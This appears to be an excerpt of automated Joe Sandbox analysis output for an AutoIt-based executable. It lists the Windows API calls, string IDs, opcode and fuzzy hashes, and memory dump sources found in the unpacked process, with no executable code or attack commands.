                                                                                                                                        • Opcode ID: 588dcb7f6cb1cddf232ae68815422ffe12e3cf27e7e94435c2a780ab6acbf51d
                                                                                                                                        • Instruction ID: 8e8933f2dc4c27858de010e750bfaf9af7f58df1d07d6d339bf938aa16b84f67
                                                                                                                                        • Opcode Fuzzy Hash: 588dcb7f6cb1cddf232ae68815422ffe12e3cf27e7e94435c2a780ab6acbf51d
                                                                                                                                        • Instruction Fuzzy Hash: 3C11AC30D4051CDBCF00EFE4D988AEEBB38FF8A310F018145E941B6140CB799960CB99
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0078869D: __getptd_noexit.LIBCMT ref: 0078869E
                                                                                                                                        • __lock.LIBCMT ref: 0078811F
                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 0078813C
                                                                                                                                        • _free.LIBCMT ref: 0078814F
                                                                                                                                        • InterlockedIncrement.KERNEL32(011965A0), ref: 00788167
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2704283638-0
                                                                                                                                        APIs
                                                                                                                                        • __lock.LIBCMT ref: 00788768
                                                                                                                                          • Part of subcall function 00788984: __mtinitlocknum.LIBCMT ref: 00788996
                                                                                                                                          • Part of subcall function 00788984: RtlEnterCriticalSection.NTDLL(00780127), ref: 007889AF
                                                                                                                                        • InterlockedIncrement.KERNEL32(DC840F00), ref: 00788775
                                                                                                                                        • __lock.LIBCMT ref: 00788789
                                                                                                                                        • ___addlocaleref.LIBCMT ref: 007887A7
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1687444384-0
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007CE14D
                                                                                                                                        • _memset.LIBCMT ref: 007CE15C
                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00823EE0,00823F24), ref: 007CE18B
                                                                                                                                        • CloseHandle.KERNEL32 ref: 007CE19D
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3277943733-0
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 007A9C7F
                                                                                                                                          • Part of subcall function 007AAD14: _memset.LIBCMT ref: 007AAD49
                                                                                                                                        • _memmove.LIBCMT ref: 007A9CA2
                                                                                                                                        • _memset.LIBCMT ref: 007A9CAF
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 007A9CBF
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 48991266-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0077B5EB
                                                                                                                                          • Part of subcall function 0077B58B: SelectObject.GDI32(?,00000000), ref: 0077B5FA
                                                                                                                                          • Part of subcall function 0077B58B: BeginPath.GDI32(?), ref: 0077B611
                                                                                                                                          • Part of subcall function 0077B58B: SelectObject.GDI32(?,00000000), ref: 0077B63B
                                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007CE860
                                                                                                                                        • LineTo.GDI32(00000000,?,?), ref: 007CE86D
                                                                                                                                        • EndPath.GDI32(00000000), ref: 007CE87D
                                                                                                                                        • StrokePath.GDI32(00000000), ref: 007CE88B
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1539411459-0
                                                                                                                                        APIs
                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0079D640
                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0079D653
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0079D65A
                                                                                                                                        • AttachThreadInput.USER32(00000000), ref: 0079D661
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2710830443-0
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0079BE01
                                                                                                                                        • OpenThreadToken.ADVAPI32(00000000), ref: 0079BE08
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0079BE15
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0079BE1C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3974789173-0
                                                                                                                                        APIs
                                                                                                                                        • GetSysColor.USER32(00000008), ref: 0077B0C5
                                                                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 0077B0CF
                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0077B0E4
                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 0077B0EC
                                                                                                                                        • GetWindowDC.USER32(?,00000000), ref: 007DECFA
                                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 007DED07
                                                                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 007DED20
                                                                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 007DED39
                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 007DED59
                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 007DED64
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1946975507-0
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: >$DEFINE
                                                                                                                                        • API String ID: 4104443479-1664449232
                                                                                                                                        APIs
                                                                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 0079ECA0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ContainedObject
                                                                                                                                        • String ID: AutoIt3GUI$Container
                                                                                                                                        • API String ID: 3565006973-3941886329
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00763BCF: _wcscpy.LIBCMT ref: 00763BF2
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                        • __wcsnicmp.LIBCMT ref: 007AE785
                                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007AE84E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                        • String ID: LPT
                                                                                                                                        • API String ID: 3222508074-1350329615
                                                                                                                                        • Opcode ID: bd35253247867ea91898159a1bfc6ed23e7ff4b7f6bb27e75795e77f0778a663
                                                                                                                                        • Instruction ID: dbdb875cd393eb9065f5a8a59dfedce8fb166b1125ade0f7e5c491513d62c340
                                                                                                                                        • Opcode Fuzzy Hash: bd35253247867ea91898159a1bfc6ed23e7ff4b7f6bb27e75795e77f0778a663
                                                                                                                                        • Instruction Fuzzy Hash: 4B619875A00215EFCB14EF94C895EADB7F4EF89310F044169F556AB391DB38AE80CB51
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00761B83
                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00761B9C
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                                        • Opcode ID: 575f331171e12814f6c156e756458ce909e3cff87c37fcbefefa0183e6fe31b5
                                                                                                                                        • Instruction ID: 631111bcfffc2e2e4e914c84560ae565f8c10e976b75899fad96b9b3a686e759
                                                                                                                                        • Opcode Fuzzy Hash: 575f331171e12814f6c156e756458ce909e3cff87c37fcbefefa0183e6fe31b5
                                                                                                                                        • Instruction Fuzzy Hash: 2F514771408744ABE720AF14DC89BABBBECFF98394F41884DF1D8411A2EB75856DC762
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076417D: __fread_nolock.LIBCMT ref: 0076419B
                                                                                                                                        • _wcscmp.LIBCMT ref: 007ACF49
                                                                                                                                        • _wcscmp.LIBCMT ref: 007ACF5C
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                                                                        • String ID: FILE
                                                                                                                                        • API String ID: 4029003684-3121273764
                                                                                                                                        • Opcode ID: ae1e2e1dd84e8253f3523386d1e03d3cb5d47f5135036355e5b69f4305ddfda6
                                                                                                                                        • Instruction ID: b23cc5e8bd2e9d3a5c8af7fb7dffd5631a68f6a14943c580b171b062e7fc1c12
                                                                                                                                        • Opcode Fuzzy Hash: ae1e2e1dd84e8253f3523386d1e03d3cb5d47f5135036355e5b69f4305ddfda6
                                                                                                                                        • Instruction Fuzzy Hash: 2C41B532A0421DBEDF11DBA4CC45FEF7BB9AF8A710F000569F501EB191D7799A448751
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0078889E: __getptd_noexit.LIBCMT ref: 0078889E
                                                                                                                                        • __getbuf.LIBCMT ref: 00789B8A
                                                                                                                                        • __lseeki64.LIBCMT ref: 00789BFA
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                                                                        • String ID: pMy
                                                                                                                                        • API String ID: 3311320906-3351136658
                                                                                                                                        • Opcode ID: 331a70b678225c843345e537468ba66aa2906881e42d5e1c25e35b5bf56e8767
                                                                                                                                        • Instruction ID: be7d01e249dee380bc2fa869fcf1b66a7b586601ca2cbabed5b6d8e833785617
                                                                                                                                        • Opcode Fuzzy Hash: 331a70b678225c843345e537468ba66aa2906881e42d5e1c25e35b5bf56e8767
                                                                                                                                        • Instruction Fuzzy Hash: 114132B1540B059FD734AF78D895A7A7BE4AF41330F08861DE6AA872D1E37CE8408B20
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 007CA668
                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007CA67D
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: '
                                                                                                                                        • API String ID: 3850602802-1997036262
                                                                                                                                        • Opcode ID: eb88dc4ecbdbc59a82030cf7c575b369a83700e10a88ef8620ff639101276aa5
                                                                                                                                        • Instruction ID: d35a707f99240e80018e7e4455fb33ca463e92dae9fd6bbabfa1e748f085b68d
                                                                                                                                        • Opcode Fuzzy Hash: eb88dc4ecbdbc59a82030cf7c575b369a83700e10a88ef8620ff639101276aa5
                                                                                                                                        • Instruction Fuzzy Hash: 3F41F375A00209AFDB14CFA8D980FDA7BB5FB09305F14406EE919AB381D774A952CFA1
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 007C961B
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007C9657
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$DestroyMove
                                                                                                                                        • String ID: static
                                                                                                                                        • API String ID: 2139405536-2160076837
                                                                                                                                        • Opcode ID: 7f268fbceda4d1b0d2ac7927b7c5be3a7abf8a000764e34d7da5146892949b15
                                                                                                                                        • Instruction ID: cfef439392f8c4e984f82832dc99c0f4d022b7e95c6410f21a85db3b8b85f366
                                                                                                                                        • Opcode Fuzzy Hash: 7f268fbceda4d1b0d2ac7927b7c5be3a7abf8a000764e34d7da5146892949b15
                                                                                                                                        • Instruction Fuzzy Hash: 6B31AD31500604AEEB109F24DC88FFB77A9FF48360F10851DF9A9D7190CA39AD91CB60
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007A5BE4
                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007A5C1F
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                                        APIs
                                                                                                                                        • __snwprintf.LIBCMT ref: 007B6BDD
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __snwprintf_memmove
                                                                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                        • API String ID: 3506404897-2584243854
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007C9269
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007C9274
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: Combobox
                                                                                                                                        • API String ID: 3850602802-2096851135
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077C657
                                                                                                                                          • Part of subcall function 0077C619: GetStockObject.GDI32(00000011), ref: 0077C66B
                                                                                                                                          • Part of subcall function 0077C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077C675
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 007C9775
                                                                                                                                        • GetSysColor.USER32(00000012), ref: 007C978F
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                        • String ID: static
                                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                                        APIs
                                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 007C94A6
                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007C94B5
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                                                                        • String ID: edit
                                                                                                                                        • API String ID: 2978978980-2167791130
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007A5CF3
                                                                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007A5D12
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                                        APIs
                                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007B544C
                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007B5475
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                                        • String ID: <local>
                                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: htonsinet_addr
                                                                                                                                        • String ID: 255.255.255.255
                                                                                                                                        • API String ID: 3832099526-2422070025
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0079C5E5
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __fread_nolock_memmove
                                                                                                                                        • String ID: EA06
                                                                                                                                        • API String ID: 1988441806-3962188686
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 0079C4E1
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 0079C562
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassName_wcscmp
                                                                                                                                        • String ID: #32770
                                                                                                                                        • API String ID: 2292705959-463685578
                                                                                                                                        APIs
                                                                                                                                        • __umatherr.LIBCMT ref: 0078DA2A
                                                                                                                                          • Part of subcall function 0078DD86: __ctrlfp.LIBCMT ref: 0078DDE5
                                                                                                                                        • __ctrlfp.LIBCMT ref: 0078DA47
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __ctrlfp$__umatherr
                                                                                                                                        • String ID: xn}
                                                                                                                                        • API String ID: 219961500-1885973330
                                                                                                                                        APIs
                                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0079B36B
                                                                                                                                          • Part of subcall function 00782011: _doexit.LIBCMT ref: 0078201B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message_doexit
                                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                                        • API String ID: 1993061046-4017498283
                                                                                                                                        APIs
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 007DBAB8
                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 007DBCAB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DirectoryFreeLibrarySystem
                                                                                                                                        • String ID: WIN_XPe
                                                                                                                                        • API String ID: 510247158-3257408948
                                                                                                                                        APIs
                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007C84DF
                                                                                                                                        • PostMessageW.USER32(00000000), ref: 007C84E6
                                                                                                                                          • Part of subcall function 007A8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007A83CD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                        APIs
                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007C849F
                                                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007C84B2
                                                                                                                                          • Part of subcall function 007A8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007A83CD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                        APIs
                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 007AD01E
                                                                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 007AD035
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                                        • String ID: aut
                                                                                                                                        • API String ID: 3285503233-3010740371